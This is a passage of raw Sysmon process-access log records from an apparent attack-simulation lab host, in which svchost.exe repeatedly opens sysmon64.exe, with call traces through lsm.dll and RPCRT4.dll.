indows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001764Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.040{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001763Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.040{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001762Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.040{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001761Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.040{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001760Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.040{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001759Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.040{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001758Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.040{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001757Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.962{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001756Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.962{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001755Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.962{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001754Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.962{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001753Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.962{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001752Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.962{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001751Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.962{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001750Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.962{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001749Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.962{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001748Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.962{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001747Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.962{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001746Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.962{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001745Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.962{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001744Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.962{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001743Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.962{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001742Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.962{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001741Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.962{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001740Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 